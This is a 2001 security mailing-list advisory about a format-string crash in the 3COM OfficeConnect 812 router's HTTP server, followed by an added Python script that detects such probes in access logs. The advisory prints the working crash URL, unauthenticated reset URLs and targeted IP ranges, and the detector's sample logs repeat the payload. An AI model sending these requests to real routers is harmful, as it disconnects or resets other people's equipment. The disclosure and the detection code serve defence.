From: inc (ix_lsdhotmail.com)
Date: Tue May 15 2001 - 07:56:08 CDT

    Yesterday night I discovered a vulnerability. The router is a 3COM
    OfficeConnect 812 and the vulnerability is in the HTTP server, on port 80.
    When you connect with a browser to one of these routers, you are asked for
    a user/password; if you fail, you see a web page telling you that it is a
    protected object, but there is a .GIF file you have access to, and you don't
    need to put the .GIF.

    http://192.168.1.254/graphics/sml3com

    well... you put this, and you see the image...

    well.... let's add a long string after it

    Exploit:
    --------

    http://192.168.1.254/graphics/sml3com%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%
    s%s%s%s%s%s%s%s%s%%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
    %s%s%s%s%s%s%s

    ...the router causes an NMI, red lights, flashing lights... and it's dead...
    it disconnects and comes online again in a minute.

    3COM OfficeConnect 812 is the router that Terra (from Telefonica Spain) puts
    on almost all DSL connections, even for all sorts of businesses. They are
    still selling this router even though there is a newer firmware (not tested
    yet) that maybe resolves this problem.

    Solution: put filters on the router for the remote sites and only allow
    connections to 23 and 80 from the local network. If you're Spanish, take care
    because your IP is fixed and you have a very "clear" domain, 195.255.*.* and
    217.97.*.*

    Not Copyrighted by UnMateria - May 2001 :-)

    ANNEX:

    http://192.168.1.254/adsl_pair_select
    http://192.168.1.254/adsl_reset

    Very insecure for strangers ;-)... the server here doesn't ask for a password,
    so you can't reset the router from the web interface itself (and without credentials)
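The crash described in this post comes from a run of printf-style `%s` directives appended to a URL path, the classic signature of a format-string bug in an embedded HTTP server. An operator watching a web-server or proxy access log can flag such probes before they reach a device like this one. The following detector is an added example written for this archive page; it is not code from the original poster or from 3Com. The log lines are constructed samples in Common Log Format, the `/graphics/sml3com` path is taken from the post, and the threshold of three directives per request is an assumption chosen to keep ordinary URL-encoded queries (which can decode to a single stray `% d`) below the alert line.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); not from the post.
# Lines 3 and 4 imitate the probe pattern the advisory describes: printf-style
# directives appended to the unauthenticated image path. Line 4 shows the same
# probe with the percent signs themselves URL-encoded (%25s), which a naive
# substring match on "%s" would miss.
SAMPLE_LOG = """\
10.0.0.5 - - [15/May/2001:07:56:08 -0500] "GET /graphics/sml3com HTTP/1.0" 200 1024
10.0.0.5 - - [15/May/2001:07:56:09 -0500] "GET /index.html HTTP/1.0" 401 312
10.0.0.9 - - [15/May/2001:07:57:01 -0500] "GET /graphics/sml3com%s%s%s%s%s%s%s%s HTTP/1.0" 200 1024
10.0.0.9 - - [15/May/2001:07:57:02 -0500] "GET /graphics/sml3com%25s%25s%25s%25n HTTP/1.0" 200 1024
10.0.0.7 - - [15/May/2001:07:58:00 -0500] "GET /search?q=100%25%20done HTTP/1.0" 200 55
"""

# Minimal Common Log Format parser: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# A printf conversion: '%', optional flags, width, precision and length
# modifier, then a conversion character. %n is the one that lets a format
# string write memory, so it is included alongside the read-only conversions.
DIRECTIVE_RE = re.compile(
    r'%[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|L|z|j|t)?[diouxXeEfgGcspn]'
)


def count_format_directives(path: str) -> int:
    """Count printf-style directives in a request path after URL-decoding.

    Decoding first matters: '%25s' becomes '%s', while a bare '%s' is not a
    valid percent-escape and is left untouched by unquote().
    """
    decoded = unquote(path)
    return len(DIRECTIVE_RE.findall(decoded))


def flag_format_string_probes(log_text: str, threshold: int = 3) -> list:
    """Return one record per request whose path carries at least `threshold`
    format directives. `threshold` is an assumed tuning value: a single
    accidental directive (e.g. '% d' from '%25%20d') is common in benign
    traffic, whereas a run of them is characteristic of a probe."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        n = count_format_directives(m['path'])
        if n >= threshold:
            hits.append({
                'ip': m['ip'],
                'timestamp': m['ts'],
                'path': m['path'],
                'directives': n,
                'status': m['status'],
            })
    return hits


if __name__ == '__main__':
    for hit in flag_format_string_probes(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['timestamp']} {hit['directives']:>2} directives: {hit['path']}")
```

Running the block prints the two requests from 10.0.0.9 and nothing for the benign search query. The decode-then-match order is the part worth keeping when adapting this to a real log source: the post's own exploit URL uses literal `%s`, but the same payload survives a round of percent-encoding, so matching on the raw path would let the `%25s` form through.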